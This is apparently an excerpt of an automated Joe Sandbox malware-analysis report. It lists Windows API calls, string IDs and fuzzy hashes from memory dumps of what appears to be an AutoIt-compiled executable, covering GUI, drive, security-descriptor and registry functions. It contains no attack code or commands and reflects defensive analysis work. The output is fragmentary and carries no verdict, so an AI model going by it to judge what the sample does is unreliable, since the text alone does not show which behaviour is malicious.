                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                                    • Opcode ID: 22265dcb5f48bbe6abfb0a2c9e1dcebae8b833fe0c6ad9561d31d16622091148
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7de4d4708176f07c567204d2d774738209e74e28a51cb82a7a436c242905a79f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22265dcb5f48bbe6abfb0a2c9e1dcebae8b833fe0c6ad9561d31d16622091148
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55029F71900215AFDB14CF69DD49EAF7BB9EF89310F148218F905BB2A0DB74AD05CB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00E216B4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E62B07
                                                                                                                                                                                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E62B40
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E62F85
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E21488,?,00000000,?,?,?,?,00E2145A,00000000,?), ref: 00E21865
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00E62FC1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E62FD8
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E62FEE
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E62FF9
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                                    • String ID: 0$($($(
                                                                                                                                                                                                                                                                                                    • API String ID: 2760611726-1684351147
                                                                                                                                                                                                                                                                                                    • Opcode ID: c2997785f6b4c94147334f41b3aa1a001dfcd089c8834881d37ddf287b8fa228
                                                                                                                                                                                                                                                                                                    • Instruction ID: 663d887496b66ef3722e4ac93efcdc8a374f9d384c945a82d44693cb0df94791
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2997785f6b4c94147334f41b3aa1a001dfcd089c8834881d37ddf287b8fa228
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0612D030604611DFC725CF24E844BBABBE1FB94344F18616DF685BB261C772E986CB91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 00EA319B
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EA32C7
                                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00EA3306
                                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00EA3316
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00EA335D
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00EA3369
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00EA33B2
                                                                                                                                                                                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EA33C1
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00EA33D1
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00EA33D5
                                                                                                                                                                                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00EA33E5
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EA33EE
                                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00EA33F7
                                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EA3423
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EA343A
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00EA347A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EA348E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EA349F
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00EA34D4
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00EA34DF
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EA34EA
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00EA34F4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                                    • Opcode ID: ac98c4eec6acc74b957bc750cbe132c264b19cecff139f0e5fc1d15cab49223e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7448fccf5bf0a0a4e0064ef5228629e046e2034ee6cabc1d3a032187bc2ff79a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac98c4eec6acc74b957bc750cbe132c264b19cecff139f0e5fc1d15cab49223e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFB15DB1A01215AFDB14DFA9DC45FAF7BA9EB49710F104218FA14FB2A0D774AD44CBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00E95532
                                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00EBDC30,?,\\.\,00EBDCD0), ref: 00E9560F
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00EBDC30,?,\\.\,00EBDCD0), ref: 00E9577B
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0517349b7eb241097efaf16ea723a7e7bd9dce079511726b31ccb0aa82c20701
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2377bb0c093a2d3999a7ed2e22f94c26782bf0241966d1c11f12d0ec65216d6d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0517349b7eb241097efaf16ea723a7e7bd9dce079511726b31ccb0aa82c20701
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41611832608A49DFCF2ADF65ED928BC77A1EF45314B247016E846BB292D731DE02CB41
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E225F8
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00E22600
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E2262B
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00E22633
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00E22658
                                                                                                                                                                                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E22675
                                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E22685
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E226B8
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E226CC
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00E226EA
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00E22706
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E22711
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: GetCursorPos.USER32(?), ref: 00E219E1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: ScreenToClient.USER32(00000000,?), ref: 00E219FE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: GetAsyncKeyState.USER32(00000001), ref: 00E21A23
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: GetAsyncKeyState.USER32(00000002), ref: 00E21A3D
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00E2199C), ref: 00E22738
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                                    • String ID: <)$<)$AutoIt v3 GUI$($($(
                                                                                                                                                                                                                                                                                                    • API String ID: 1458621304-3080182634
                                                                                                                                                                                                                                                                                                    • Opcode ID: 26e32b980c7d6378ce53c6f5d18ee95a3fd747b07b26e32040cbcea741f5922c
                                                                                                                                                                                                                                                                                                    • Instruction ID: d0cfc18fc0434fcc94150bc0077e210a693bfb6d997d525853c4f2da4db283e0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26e32b980c7d6378ce53c6f5d18ee95a3fd747b07b26e32040cbcea741f5922c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0B17B35A40219AFCB14DFA9EC45BEE7BB4FB88314F109229FA05B72A4DB749940CF51
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00EB1BC4
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00EB1BD9
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00EB1BE0
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB1C35
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00EB1C55
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EB1C89
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EB1CA7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EB1CB9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00EB1CCE
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00EB1CE1
                                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 00EB1D3D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00EB1D58
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00EB1D6C
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00EB1D84
                                                                                                                                                                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00EB1DAA
                                                                                                                                                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00EB1DC4
                                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00EB1DDB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00EB1E46
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                                    • Opcode ID: 920619f736819f12022b330d4a9061651ef0ded6016873fa8ad39b2f69655bfe
                                                                                                                                                                                                                                                                                                    • Instruction ID: 06dedbb9796681f5224105f847d245ca5c547f02ebff93c7cd010a056102b62b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 920619f736819f12022b330d4a9061651ef0ded6016873fa8ad39b2f69655bfe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FB19B71608301AFD714DF64C894B9BFBE5EF84324F409A5CF599AB2A1D731E844CB92
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00EB0D81
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB0DBB
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB0E25
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB0E8D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB0F11
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EB0F61
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EB0FA0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3FD52: _wcslen.LIBCMT ref: 00E3FD5D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E82BA5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E82BD7
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                                    • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                                    • Opcode ID: 87a59c89b301b356e2b1acc6bbe0cc05f360fce4f96d5d08ec297b0627ea6a1e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4d93e31cdce14a41418fa7245e40c2a36737d0c2174db5585fdbd9547602b96c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87a59c89b301b356e2b1acc6bbe0cc05f360fce4f96d5d08ec297b0627ea6a1e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40E19E312083418FC714EF28C9519ABB7E6BF88318B54696DF49ABB3A1DB30ED45CB51
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E81A60
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A6C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A82
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E81A99
                                                                                                                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E81741
                                                                                                                                                                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E81775
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00E8178C
                                                                                                                                                                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00E817C6
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E817E2
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00E817F9
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E81801
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00E81808
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E81829
                                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00E81830
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E8185F
                                                                                                                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E81881
                                                                                                                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E81893
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E818BA
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E818C1
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E818CA
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E818D1
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E818DA
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E818E1
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00E818ED
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E818F4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81ADF: GetProcessHeap.KERNEL32(00000008,00E814FD,?,00000000,?,00E814FD,?), ref: 00E81AED
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E814FD,?), ref: 00E81AF4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E814FD,?), ref: 00E81B03
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a453dd84283039c6e1a195e72e6602942f20fac2156fdbbcfabf87407c95d80c
                                                                                                                                                                                                                                                                                                    • Instruction ID: c00a3d2538fe7cd4555a1574c091935afd63fffd92269b91f911061b4bc40415
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a453dd84283039c6e1a195e72e6602942f20fac2156fdbbcfabf87407c95d80c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29717DB1D0420AAFDB10EFA5EC45FAFBBBDAF04314F144265E919B6190E7319906CB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EACF1D
                                                                                                                                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00EBDCD0,00000000,?,00000000,?,?), ref: 00EACFA4
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00EAD004
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EAD054
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EAD0CF
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00EAD112
